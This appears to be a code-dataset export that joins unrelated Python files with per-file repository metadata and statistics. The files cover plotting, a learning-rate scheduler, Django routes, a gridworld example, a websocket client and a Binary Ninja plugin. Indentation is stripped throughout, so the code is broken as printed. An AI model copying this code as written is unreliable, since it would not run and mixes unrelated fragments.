plt.plot(x_array4Star, y_array4Star, 'ro', markersize=2.0)
plt.plot(x_array5Star, y_array5Star, 'ro', markersize=2.0)
plt.axis([0, 5, 0, 1])
plt.axvline(x=1, ymin=0, ymax = 1, linewidth=1, color='r')
plt.axvline(x=2, ymin=0, ymax = 1, linewidth=1, color='r')
plt.axvline(x=3, ymin=0, ymax = 1, linewidth=1, color='r')
plt.axvline(x=4, ymin=0, ymax = 1, linewidth=1, color='r')
plt.axvline(x=5, ymin=0, ymax = 1, linewidth=1, color='r')
#plt.show()
plt.savefig(pp, format='pdf')
pp.close()
def main():
features = []
features1 = [0, 1, 2, 3, 4, 5, 8]
features2 = [0, 1, 2, 3, 4, 5, 8, 9, 10, 11]
features3 = [0, 1, 2, 3, 4, 5, 8, 14, 15, 16, 17, 18, 19]
features4 = [0, 1, 2, 3, 4, 5, 8, 9, 10, 11, 14, 15, 16, 17, 18, 19]
features5 = [6, 7, 8]
features6 = [6, 7, 8, 9, 10, 11]
features7 = [6, 7, 8, 14, 15, 16, 17, 18, 19]
features8 = [6, 7, 8, 9, 10, 11, 14, 15, 16, 17, 18, 19]
features9 = [12, 13, 8]
features10 = [12, 13, 8, 9, 10, 11]
features11 = [12, 13, 8, 14, 15, 16, 17, 18, 19]
features12 = [12, 13, 8, 9, 10, 11, 14, 15, 16, 17, 18, 19]
features13 = [20, 21, 22, 23, 24]
features14 = [20, 21, 22, 23, 24, 9, 10, 11]
features15 = [20, 21, 22, 23, 24, 14, 15, 16, 17, 18, 19]
features.append(features1)
features.append(features2)
features.append(features3)
features.append(features4)
features.append(features5)
features.append(features6)
features.append(features7)
features.append(features8)
features.append(features9)
features.append(features10)
features.append(features11)
features.append(features12)
features.append(features13)
features.append(features14)
features.append(features15)
print(features)
for i in xrange(1, 16):
print(i)
output = 'report/refs/COS/multipage' + str(i) + '.pdf'
drawCOSFigure(features[i-1], output)
if __name__ == "__main__":
main()
| 34.485714 | 89 | 0.594532 | 804 | 6,035 | 4.38806 | 0.176617 | 0.018141 | 0.018707 | 0.015873 | 0.44076 | 0.427438 | 0.417234 | 0.291667 | 0.291667 | 0.272676 | 0 | 0.087503 | 0.274731 | 6,035 | 174 | 90 | 34.683908 | 0.718529 | 0.001657 | 0 | 0.173611 | 0 | 0 | 0.059097 | 0.045651 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013889 | false | 0 | 0.027778 | 0 | 0.041667 | 0.013889 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
247640d80add47e8ea829bcb77b7fb6e623ffeff | 579 | py | Python | cobu/constants.py | tlancaster6/cobu | 444f249bdec5b009858011002fa0782520891e2b | [
"MIT"
] | null | null | null | cobu/constants.py | tlancaster6/cobu | 444f249bdec5b009858011002fa0782520891e2b | [
"MIT"
] | null | null | null | cobu/constants.py | tlancaster6/cobu | 444f249bdec5b009858011002fa0782520891e2b | [
"MIT"
] | null | null | null | import os
try:
from importlib.metadata import metadata # Python 3.8
except ImportError:
from importlib_metadata import metadata # Python < 3.8
COBU_DIR = os.path.dirname(os.path.abspath(__file__))
BASE_DIR = os.path.dirname(COBU_DIR)
DATA_DIR = os.path.join(BASE_DIR, 'data')
# package metadata
_META = metadata("cobu")
NAME = _META["name"]
VERSION = _META["version"]
DESCRIPTION = _META["summary"]
AUTHOR = _META["author"]
AUTHOR_EMAIL = _META["author-email"]
URL = _META["home-page"]
LICENSE = _META["license"]
VERSION_LONG = "FiftyOne v%s, %s" % (VERSION, AUTHOR)
| 27.571429 | 59 | 0.723661 | 82 | 579 | 4.865854 | 0.439024 | 0.06015 | 0.067669 | 0.135338 | 0.215539 | 0.215539 | 0.215539 | 0.215539 | 0 | 0 | 0 | 0.007968 | 0.132988 | 579 | 20 | 60 | 28.95 | 0.786853 | 0.069085 | 0 | 0 | 0 | 0 | 0.142056 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.235294 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
247809f8e798b2d4ad909e369111e3462830ca09 | 2,339 | py | Python | wandroid/devices/utils.py | westurner/wandroid | f05e085f1f9d722b69c321bf8bd7320a8fa9f93e | [
"BSD-3-Clause"
] | null | null | null | wandroid/devices/utils.py | westurner/wandroid | f05e085f1f9d722b69c321bf8bd7320a8fa9f93e | [
"BSD-3-Clause"
] | null | null | null | wandroid/devices/utils.py | westurner/wandroid | f05e085f1f9d722b69c321bf8bd7320a8fa9f93e | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
from __future__ import print_function
"""
wandroid devices
"""
import pkg_resources
import wandroid.adbw as adbw
def get_devices():
"""
mainfunc
"""
entry_points = pkg_resources.iter_entry_points(group='wandroid_devices')
for ep in entry_points:
yield ep.name, ep.load()
def list_devices():
print('installed wandroid.device packages\n'
'----------------------------------')
devices = get_devices()
for name, cls in devices:
print(name, cls)
print('')
print('adb devices\n'
'-----------')
adbw.adb('devices')
print('')
import unittest
class Test_wandroid_devices(unittest.TestCase):
def test_get_devices(self):
devices = get_devices()
devices = list(devices)
self.assertTrue(bool(len(devices)))
def main():
import logging
import optparse
import os.path
import sys
# TODO: argparse
if '-d' in sys.argv:
devname = sys.argv[2]
devices = dict(get_devices())
if devname not in devices:
raise Exception("%r not in %r" % (devname, devices.keys()))
cls = devices.get(devname)
scriptname = os.path.basename(cls.__module__)
newargs = [scriptname] + sys.argv[3:]
print(newargs)
return cls.main(*newargs)
prs = optparse.OptionParser(usage="%prog : args")
prs.add_option('-l', '--list-devices',
dest='list_devices',
action='store_true',
help='List supported devices')
prs.add_option('-v', '--verbose',
dest='verbose',
action='store_true',)
prs.add_option('-q', '--quiet',
dest='quiet',
action='store_true',)
prs.add_option('-t', '--test',
dest='run_tests',
action='store_true',)
(opts, args) = prs.parse_args()
if not opts.quiet:
logging.basicConfig()
if opts.verbose:
logging.getLogger().setLevel(logging.DEBUG)
if opts.run_tests:
sys.argv = [sys.argv[0]] + args
import unittest
sys.exit(unittest.main())
if opts.list_devices:
list_devices()
if __name__ == "__main__":
import sys
sys.exit(main())
| 24.364583 | 76 | 0.558786 | 262 | 2,339 | 4.80916 | 0.381679 | 0.052381 | 0.038095 | 0.028571 | 0.042857 | 0.042857 | 0 | 0 | 0 | 0 | 0 | 0.002424 | 0.29457 | 2,339 | 95 | 77 | 24.621053 | 0.761212 | 0.025652 | 0 | 0.164179 | 0 | 0 | 0.129638 | 0.015199 | 0 | 0 | 0 | 0.010526 | 0.014925 | 1 | 0.059701 | false | 0 | 0.149254 | 0 | 0.238806 | 0.104478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2479d7af5d28d64ede7ccc8bebd1054c83190763 | 885 | py | Python | params_flow/utils/learn_scheduler.py | kpe/params-flow | 5857dfd67cf15e89803e5987316c81fe6c4cc54d | [
"MIT"
] | 23 | 2019-06-08T17:24:05.000Z | 2022-01-16T17:53:15.000Z | params_flow/utils/learn_scheduler.py | kpe/params-flow | 5857dfd67cf15e89803e5987316c81fe6c4cc54d | [
"MIT"
] | null | null | null | params_flow/utils/learn_scheduler.py | kpe/params-flow | 5857dfd67cf15e89803e5987316c81fe6c4cc54d | [
"MIT"
] | 4 | 2019-09-29T07:25:24.000Z | 2020-11-25T15:02:15.000Z | # coding=utf-8
#
# created by kpe on 10.08.2019 at 12:39 AM
#
from __future__ import division, absolute_import, print_function
import math
from tensorflow import keras
def create_one_cycle_lr_scheduler(max_learn_rate=5e-5,
end_learn_rate=1e-7,
warmup_epoch_count=10,
total_epoch_count=90):
def lr_scheduler(epoch):
if epoch < warmup_epoch_count:
res = (max_learn_rate / warmup_epoch_count) * (epoch + 1)
else:
k = math.log(end_learn_rate / max_learn_rate) / (total_epoch_count - warmup_epoch_count)
res = max_learn_rate * math.exp(k * (epoch - warmup_epoch_count))
return float(res)
learning_rate_scheduler = keras.callbacks.LearningRateScheduler(lr_scheduler, verbose=1)
return learning_rate_scheduler
| 30.517241 | 100 | 0.640678 | 114 | 885 | 4.605263 | 0.491228 | 0.133333 | 0.152381 | 0.08 | 0.118095 | 0.118095 | 0.118095 | 0 | 0 | 0 | 0 | 0.03645 | 0.287006 | 885 | 28 | 101 | 31.607143 | 0.795563 | 0.059887 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.1875 | 0 | 0.4375 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
247aaaa9afe8af3944f0215ec29353a612a9ac89 | 445 | py | Python | cegid/apps/main/urls.py | vsoch/tcell | 3c4a19e5c78f1a36a2fe5e0f3229d1d70ef3a2c6 | [
"MIT"
] | null | null | null | cegid/apps/main/urls.py | vsoch/tcell | 3c4a19e5c78f1a36a2fe5e0f3229d1d70ef3a2c6 | [
"MIT"
] | 9 | 2016-08-04T22:56:21.000Z | 2016-08-17T20:55:57.000Z | cegid/apps/main/urls.py | vsoch/tcell | 3c4a19e5c78f1a36a2fe5e0f3229d1d70ef3a2c6 | [
"MIT"
] | 1 | 2016-10-11T04:22:52.000Z | 2016-10-11T04:22:52.000Z | from django.views.generic.base import TemplateView
from django.conf.urls import patterns, url
from .views import index_view, signup_view, about_view, search_view, \
home_view, contact_view
urlpatterns = [
url(r'^$', index_view, name="index"),
url(r'^search$', search_view, name="search"),
url(r'^contact$', contact_view, name="contact"),
url(r'^about$', about_view, name="about"),
url(r'^home$', home_view, name="home")
]
| 34.230769 | 70 | 0.694382 | 64 | 445 | 4.65625 | 0.328125 | 0.067114 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137079 | 445 | 12 | 71 | 37.083333 | 0.776042 | 0 | 0 | 0 | 0 | 0 | 0.132584 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.272727 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
247b0f2580310cad3e1f381e524fdce487e2bc44 | 212 | py | Python | students/K33422/Larionova Anastasia/lab 1/task1_client.py | ShubhamKunal/ITMO_ICT_WebDevelopment_2020-2021 | bb91c91a56d21cec2b12ae4cc722eaa652a88420 | [
"MIT"
] | 4 | 2020-09-03T15:41:42.000Z | 2021-12-24T15:28:20.000Z | students/K33422/Larionova Anastasia/lab 1/task1_client.py | ShubhamKunal/ITMO_ICT_WebDevelopment_2020-2021 | bb91c91a56d21cec2b12ae4cc722eaa652a88420 | [
"MIT"
] | 48 | 2020-09-13T20:22:42.000Z | 2021-04-30T11:13:30.000Z | students/K33422/Larionova Anastasia/lab 1/task1_client.py | ShubhamKunal/ITMO_ICT_WebDevelopment_2020-2021 | bb91c91a56d21cec2b12ae4cc722eaa652a88420 | [
"MIT"
] | 69 | 2020-09-06T10:32:37.000Z | 2021-11-28T18:13:17.000Z | import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('localhost', 7777))
sock.send('Hello, server! :)'.encode('utf-8'))
d = sock.recv(1024)
print(d.decode('utf-8'))
sock.close() | 21.2 | 56 | 0.70283 | 33 | 212 | 4.454545 | 0.636364 | 0.136054 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.051546 | 0.084906 | 212 | 10 | 57 | 21.2 | 0.706186 | 0 | 0 | 0 | 0 | 0 | 0.169014 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
247dc70e6437fecc8408f5935f960b8ac070e582 | 5,589 | py | Python | chapter-4/gridworld.py | epignatelli/Reinforcement-Learning-An-Introduction_exercises | e260cacdb1ec8e51af46da4031054d4c6771322c | [
"MIT"
] | 6 | 2020-12-13T00:34:40.000Z | 2022-03-05T03:58:46.000Z | chapter-4/gridworld.py | epignatelli/Reinforcement-Learning-An-Introduction_exercises | e260cacdb1ec8e51af46da4031054d4c6771322c | [
"MIT"
] | null | null | null | chapter-4/gridworld.py | epignatelli/Reinforcement-Learning-An-Introduction_exercises | e260cacdb1ec8e51af46da4031054d4c6771322c | [
"MIT"
] | 4 | 2021-02-03T06:32:24.000Z | 2021-09-14T22:46:51.000Z | # MIT License
# Copyright (c) 2020 Eduardo Pignatelli
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import matplotlib
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sn
from matplotlib.colors import LinearSegmentedColormap
W = LinearSegmentedColormap.from_list('w', ["w", "w"], N=256)
ACTIONS = {
0: [1, 0], # north
1: [-1, 0], # south
2: [0, -1], # west
3: [0, 1], # east
}
class GridWorld:
def __init__(self, size=4):
"""
A gridworld environment with absorbing states at [0, 0] and [size - 1, size - 1].
Args:
size (int): the dimension of the grid in each direction
cell_reward (float): the reward return after extiting any non absorbing state
"""
self.state_value = np.zeros((size, size))
return
def reset(self):
self.state_value = np.zeros((size, size))
return
def step(self, state, action):
# is terminal state?
size = len(self.state_value) - 1
if (state == (0, 0)) or (state == (size, size)):
return state, 0
s_1 = (state[0] + action[0], state[1] + action[1])
reward = -1
# out of bounds north-south
if s_1[0] < 0 or s_1[0] >= len(self.state_value):
s_1 = state
# out of bounds east-west
elif s_1[1] < 0 or s_1[1] >= len(self.state_value):
s_1 = state
return s_1, reward
def render(self, title=None):
"""
Displays the current value table of mini gridworld environment
"""
size = len(self.state_value) if len(self.state_value) < 20 else 20
fig, ax = plt.subplots(figsize=(size, size))
if title is not None:
ax.set_title(title)
ax.grid(which='major', axis='both',
linestyle='-', color='k', linewidth=2)
sn.heatmap(self.state_value, annot=True, fmt=".1f", cmap=W,
linewidths=1, linecolor="black", cbar=False)
plt.show()
return fig, ax
def bellman_expectation(self, state, probs, discount):
"""
Makes a one step lookahead and applies the bellman expectation equation to the state self.state_value[state]
Args:
state (Tuple[int, int]): the x, y indices that define the address on the value table
probs (List[float]): transition probabilities for each action
in_place (bool): if False, the value table is updated after all the new values have been calculated.
if True the state [i, j] will new already new values for the states [< i, < j]
Returns:
(numpy.ndarrray): the new value for the specified state
"""
# absorbing state
value = 0
for c, action in ACTIONS.items():
s_1, reward = self.step(state, action)
value += probs[c] * (reward + discount * self.state_value[s_1])
return value
def policy_evaluation(env, policy=None, steps=1, discount=1., in_place=False):
"""
Args:
policy (numpy.array): a numpy 3-D numpy array, where the first two dimensions identify a state and the third dimension identifies the actions.
The array stores the probability of taking each action.
steps (int): the number of iterations of the algorithm
discount (float): discount factor for the bellman equations
in_place (bool): if False, the value table is updated after all the new values have been calculated.
if True the state [i, j] will new already new values for the states [< i, < j]
"""
if policy is None:
# uniform random policy
policy = np.ones((*env.state_value.shape, len(ACTIONS))) * 0.25
for k in range(steps):
# cache old values if not in place
values = env.state_value if in_place else np.empty_like(
env.state_value)
for i in range(len(env.state_value)):
for j in range(len(env.state_value[i])):
# apply bellman expectation equation to each state
state = (i, j)
value = env.bellman_expectation(state, policy[i, j], discount)
values[i, j] = value * discount
# set the new value table
env.state_value = values
return env.state_value
if __name__ == "__main__":
# reprocuce Figure 4.1
for k in [1, 2, 3, 10, 1000]:
env = GridWorld(4)
env.render()
value_table = policy_evaluation(env, steps=k, in_place=False)
env.render()
| 39.359155 | 150 | 0.627661 | 789 | 5,589 | 4.378961 | 0.332066 | 0.052098 | 0.040521 | 0.024602 | 0.141823 | 0.125036 | 0.111722 | 0.097829 | 0.097829 | 0.075832 | 0 | 0.01868 | 0.281625 | 5,589 | 141 | 151 | 39.638298 | 0.841843 | 0.485776 | 0 | 0.121212 | 0 | 0 | 0.011295 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.075758 | 0 | 0.287879 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
247eb44c889ef4965c1c10cc694955ebaa4b8ea6 | 2,571 | py | Python | client.py | esperantomerkato/tuner | b3998f6bcaf8acd1b541e2aa0670e0f0a0a8eb7d | [
"BSD-Source-Code"
] | null | null | null | client.py | esperantomerkato/tuner | b3998f6bcaf8acd1b541e2aa0670e0f0a0a8eb7d | [
"BSD-Source-Code"
] | null | null | null | client.py | esperantomerkato/tuner | b3998f6bcaf8acd1b541e2aa0670e0f0a0a8eb7d | [
"BSD-Source-Code"
] | null | null | null | import asyncio
import json
import websockets
from merkato.merkato_config import get_config
from merkato.parser import parse
from merkato.utils.database_utils import no_merkatos_table_exists, create_merkatos_table, drop_merkatos_table, \
no_exchanges_table_exists, create_exchanges_table, drop_exchanges_table
import logging
log = logging.getLogger("client")
"""
Merkato WebSocket CLI client.
This demonstrates the behavior that will eventually be moved to a Javascript GUI client.
Establish a connection to server, get user input, send config to server,
and loop awaiting updates from server. (In the GUI, it'll also loop awaiting user action e.g. button clicks.)
"""
async def client(url):
async with websockets.connect(url) as ws:
log.info("Connected.")
try:
merkato_params = get_merkato_params_from_user()
log.info("Sending Merkato params {}".format(merkato_params))
await ws.send(json.dumps({'merkato_params': merkato_params}))
while True:
msg = await ws.recv()
print("Received {}".format(msg))
except websockets.ConnectionClosed:
log.error("Server unexpectedly closed connection, investigate.")
exit(1)
def get_merkato_params_from_user():
print("Merkato Alpha v0.1.1\n")
if no_merkatos_table_exists():
create_merkatos_table()
else:
should_drop_merkatos = input('Do you want to drop merkatos? y/n: ')
if should_drop_merkatos == 'y':
drop_merkatos_table()
create_merkatos_table()
if no_exchanges_table_exists():
create_exchanges_table()
else:
should_drop_exchanges = input('Do you want to drop exchanges? y/n: ')
if should_drop_exchanges == 'y':
drop_exchanges_table()
create_exchanges_table()
configuration = parse()
if not configuration:
configuration = get_config()
if not configuration:
raise Exception("Failed to get configuration.")
base = input("Base: ")
coin = input("Coin: ")
spread = input("Spread: ")
coin_reserve = input("Coin reserve: ")
base_reserve = input("Base reserve: ")
return {
'configuration': configuration,
'base': base,
'coin': coin,
'spread': float(spread),
'bid_reserved_balance': float(base_reserve),
'ask_reserved_balance': float(coin_reserve)
}
if __name__ == "__main__":
url = "ws://localhost:5678"
asyncio.get_event_loop().run_until_complete(client(url)) | 30.975904 | 112 | 0.669 | 312 | 2,571 | 5.269231 | 0.38141 | 0.055353 | 0.041363 | 0.025547 | 0.170316 | 0.124088 | 0.099757 | 0 | 0 | 0 | 0 | 0.004065 | 0.234539 | 2,571 | 83 | 113 | 30.975904 | 0.831301 | 0 | 0 | 0.135593 | 0 | 0 | 0.168802 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016949 | false | 0 | 0.118644 | 0 | 0.152542 | 0.033898 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
24801d3763c6b4f5d5fdf3b1bc18bbe2654427a3 | 356 | py | Python | application/web/helper.py | satan1a/poopak | 9862f09edc22c030db520e317020b54a36e070ac | [
"curl"
] | 91 | 2019-01-17T13:35:49.000Z | 2022-03-30T21:16:37.000Z | application/web/helper.py | satan1a/poopak | 9862f09edc22c030db520e317020b54a36e070ac | [
"curl"
] | 13 | 2019-01-13T14:35:51.000Z | 2021-04-26T05:13:42.000Z | application/web/helper.py | satan1a/poopak | 9862f09edc22c030db520e317020b54a36e070ac | [
"curl"
] | 33 | 2019-01-17T13:37:22.000Z | 2022-03-25T09:35:54.000Z | import re
def extract_onions(s):
result = []
print(s)
for m in re.finditer(r'(?:https?://)?(?:www)?(\S*?\.onion)\b', s, re.M | re.IGNORECASE):
url = str(m.group(0))
# url = url[len(url) - 22:]
# if "'" in url:
# url = url[url.index("'")+1:]
result.append(url)
print(result)
return result
| 20.941176 | 92 | 0.485955 | 50 | 356 | 3.44 | 0.58 | 0.139535 | 0.104651 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016 | 0.297753 | 356 | 16 | 93 | 22.25 | 0.672 | 0.205056 | 0 | 0 | 0 | 0 | 0.134058 | 0.134058 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.333333 | 0.222222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2484b713073294f833a7aedb426225a3f08b5595 | 299 | py | Python | __init__.py | d-we/binja-golang-symbol-restore | 251cc45cab66512fd404eaf69ec6e018684aa5d4 | [
"MIT"
] | 9 | 2020-06-15T09:14:18.000Z | 2021-12-30T19:39:33.000Z | __init__.py | d-we/binja-golang-symbol-restore | 251cc45cab66512fd404eaf69ec6e018684aa5d4 | [
"MIT"
] | 3 | 2020-06-10T03:29:26.000Z | 2021-02-08T19:25:51.000Z | __init__.py | d-we/binja-golang-symbol-restore | 251cc45cab66512fd404eaf69ec6e018684aa5d4 | [
"MIT"
] | 3 | 2020-08-15T16:01:14.000Z | 2020-10-14T21:48:32.000Z | import binaryninja
from .golang_symbol_restore import restore_golang_symbols
binaryninja.plugin.PluginCommand.register("Restore Golang Symbols",
"Fill region with breakpoint instructions.",
restore_golang_symbols)
| 42.714286 | 86 | 0.622074 | 25 | 299 | 7.2 | 0.6 | 0.216667 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.334448 | 299 | 6 | 87 | 49.833333 | 0.904523 | 0 | 0 | 0 | 0 | 0 | 0.210702 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |